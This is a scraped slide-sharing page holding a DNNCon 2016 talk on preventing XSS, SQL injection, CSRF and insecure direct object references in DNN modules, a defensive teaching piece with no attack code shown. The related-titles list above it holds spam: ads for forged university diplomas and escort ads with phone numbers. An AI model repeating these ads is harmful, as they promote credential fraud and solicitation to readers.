pdfcoffee.com_business-ethics-q3m7-pdf-free.pdf
 
20240509 QFM015 Engineering Leadership Reading List April 2024.pdf
20240509 QFM015 Engineering Leadership Reading List April 2024.pdf20240509 QFM015 Engineering Leadership Reading List April 2024.pdf
20240509 QFM015 Engineering Leadership Reading List April 2024.pdf
 
在线制作约克大学毕业证(yu毕业证)在读证明认证可查
在线制作约克大学毕业证(yu毕业证)在读证明认证可查在线制作约克大学毕业证(yu毕业证)在读证明认证可查
在线制作约克大学毕业证(yu毕业证)在读证明认证可查
 
原版制作美国爱荷华大学毕业证(iowa毕业证书)学位证网上存档可查
原版制作美国爱荷华大学毕业证(iowa毕业证书)学位证网上存档可查原版制作美国爱荷华大学毕业证(iowa毕业证书)学位证网上存档可查
原版制作美国爱荷华大学毕业证(iowa毕业证书)学位证网上存档可查
 
Top profile Call Girls In Dindigul [ 7014168258 ] Call Me For Genuine Models ...
Top profile Call Girls In Dindigul [ 7014168258 ] Call Me For Genuine Models ...Top profile Call Girls In Dindigul [ 7014168258 ] Call Me For Genuine Models ...
Top profile Call Girls In Dindigul [ 7014168258 ] Call Me For Genuine Models ...
 
PowerDirector Explination Process...pptx
PowerDirector Explination Process...pptxPowerDirector Explination Process...pptx
PowerDirector Explination Process...pptx
 
Best SEO Services Company in Dallas | Best SEO Agency Dallas
Best SEO Services Company in Dallas | Best SEO Agency DallasBest SEO Services Company in Dallas | Best SEO Agency Dallas
Best SEO Services Company in Dallas | Best SEO Agency Dallas
 
20240507 QFM013 Machine Intelligence Reading List April 2024.pdf
20240507 QFM013 Machine Intelligence Reading List April 2024.pdf20240507 QFM013 Machine Intelligence Reading List April 2024.pdf
20240507 QFM013 Machine Intelligence Reading List April 2024.pdf
 
best call girls in Hyderabad Finest Escorts Service 📞 9352988975 📞 Available ...
best call girls in Hyderabad Finest Escorts Service 📞 9352988975 📞 Available ...best call girls in Hyderabad Finest Escorts Service 📞 9352988975 📞 Available ...
best call girls in Hyderabad Finest Escorts Service 📞 9352988975 📞 Available ...
 
APNIC Policy Roundup, presented by Sunny Chendi at the 5th ICANN APAC-TWNIC E...
APNIC Policy Roundup, presented by Sunny Chendi at the 5th ICANN APAC-TWNIC E...APNIC Policy Roundup, presented by Sunny Chendi at the 5th ICANN APAC-TWNIC E...
APNIC Policy Roundup, presented by Sunny Chendi at the 5th ICANN APAC-TWNIC E...
 
哪里办理美国迈阿密大学毕业证(本硕)umiami在读证明存档可查
哪里办理美国迈阿密大学毕业证(本硕)umiami在读证明存档可查哪里办理美国迈阿密大学毕业证(本硕)umiami在读证明存档可查
哪里办理美国迈阿密大学毕业证(本硕)umiami在读证明存档可查
 
Indian Escort in Abu DHabi 0508644382 Abu Dhabi Escorts
Indian Escort in Abu DHabi 0508644382 Abu Dhabi EscortsIndian Escort in Abu DHabi 0508644382 Abu Dhabi Escorts
Indian Escort in Abu DHabi 0508644382 Abu Dhabi Escorts
 
一比一原版(Flinders毕业证书)弗林德斯大学毕业证原件一模一样
一比一原版(Flinders毕业证书)弗林德斯大学毕业证原件一模一样一比一原版(Flinders毕业证书)弗林德斯大学毕业证原件一模一样
一比一原版(Flinders毕业证书)弗林德斯大学毕业证原件一模一样
 
Russian Call girls in Abu Dhabi 0508644382 Abu Dhabi Call girls
Russian Call girls in Abu Dhabi 0508644382 Abu Dhabi Call girlsRussian Call girls in Abu Dhabi 0508644382 Abu Dhabi Call girls
Russian Call girls in Abu Dhabi 0508644382 Abu Dhabi Call girls
 
Russian Escort Abu Dhabi 0503464457 Abu DHabi Escorts
Russian Escort Abu Dhabi 0503464457 Abu DHabi EscortsRussian Escort Abu Dhabi 0503464457 Abu DHabi Escorts
Russian Escort Abu Dhabi 0503464457 Abu DHabi Escorts
 

DNNcon 2016: Are There Security Flaws in Your DNN Modules?

  • 1. @DNNConDon’t forget to include #DNNCon in your tweets! Are There Security Flaws in Your Modules? Joshua Bradley / Web Developer Engage Software @JRBradley1
  • 2. @DNNConDon’t forget to include #DNNCon in your tweets! THANKS TO ALL OF OUR GENEROUS SPONSORS!
  • 3. @DNNConDon’t forget to include #DNNCon in your tweets! Agenda • Introduction • Cross Site Scripting • SQL Injection • Cross Site Request Forgery • Insecure Direct Object References • Q & A
  • 4. @DNNConDon’t forget to include #DNNCon in your tweets! Goal For Developers -To think about possible security vulnerabilities while developing your modules. For Everyone -Be able to recognize potential vulnerabilities when testing websites.
  • 5. @DNNConDon’t forget to include #DNNCon in your tweets! Introduction
  • 6. @DNNConDon’t forget to include #DNNCon in your tweets! Cross Site Scripting
  • 7. @DNNConDon’t forget to include #DNNCon in your tweets! Reflective XSS
  • 8. @DNNConDon’t forget to include #DNNCon in your tweets! Reflective XSS Example
  • 9. @DNNConDon’t forget to include #DNNCon in your tweets! Stored XSS
  • 10. @DNNConDon’t forget to include #DNNCon in your tweets! Stored XSS Example
  • 11. @DNNConDon’t forget to include #DNNCon in your tweets! XSS Summary • Html Encode when not needing HTML • Use Anti XSS library when needing to accept HTML from user input.
  • 12. @DNNConDon’t forget to include #DNNCon in your tweets! SQL Injection
  • 13. @DNNConDon’t forget to include #DNNCon in your tweets! SQLi Example
  • 14. @DNNConDon’t forget to include #DNNCon in your tweets! SQLi Summary • Never do string concatenation with SQL. • Use an ORM or Parameterized Stored Procedure.
  • 15. @DNNConDon’t forget to include #DNNCon in your tweets! Cross Site Request Forgery
  • 16. @DNNConDon’t forget to include #DNNCon in your tweets! CSRF Example
  • 17. @DNNConDon’t forget to include #DNNCon in your tweets! CSRF Summary • Use HttpPost • ValidateAntiForgery • Never Allow Access from any host
  • 18. @DNNConDon’t forget to include #DNNCon in your tweets! Insecure Direct Object References
  • 19. @DNNConDon’t forget to include #DNNCon in your tweets! IDOR Example
  • 20. @DNNConDon’t forget to include #DNNCon in your tweets! IDOR Summary • Use built in Folder and File Manager. • Avoid using user input when selecting file.
  • 21. @DNNConDon’t forget to include #DNNCon in your tweets! Available on GitHub & Slideshare • http://www.engagesoftware.com/blog
  • 22. @DNNConDon’t forget to include #DNNCon in your tweets! Questions @JRBradley1
  • 23. @DNNConDon’t forget to include #DNNCon in your tweets! Resources • https://www.owasp.org/index.php/OW • http://www.dnnsoftware.com/wi ki/analysis-of-dotnetnuke- compliance-against-owasp-top- 10-2013
  • 24. @DNNConDon’t forget to include #DNNCon in your tweets! Resources • http://www.troyhunt.com/2012/12/sto • https://www.owasp.org/index.php/Ma • http://www.jwaffinityit.com/Portals/28
  • 25. @DNNConDon’t forget to include #DNNCon in your tweets! Resources • https://msdn.microsoft.com/en-us/libr aspx • https:// weblog.west-wind.com/posts/2012/Ju • http:// www.computerweekly.com/tip/C ross-site-request-forgery- Lessons-from-a-CSRF-attack- example
  • 26. @DNNConDon’t forget to include #DNNCon in your tweets! Resources • http://resources.infosecinstitute .com/dumping-a-database- using-sql-injection/ • https://www.sql- programmers.com/sql- injection.aspx • https://msdn.microsoft.com/en- us/library/bb386929.aspx • https://msdn.microsoft.com/en- us/library/cc716760.aspx
  • 27. @DNNConDon’t forget to include #DNNCon in your tweets! Resources • http://www.troyhunt.com/2013/ 07/everything-you-wanted-to- know-about-sql.html • https://github.com/malcomvett er/WidgetSender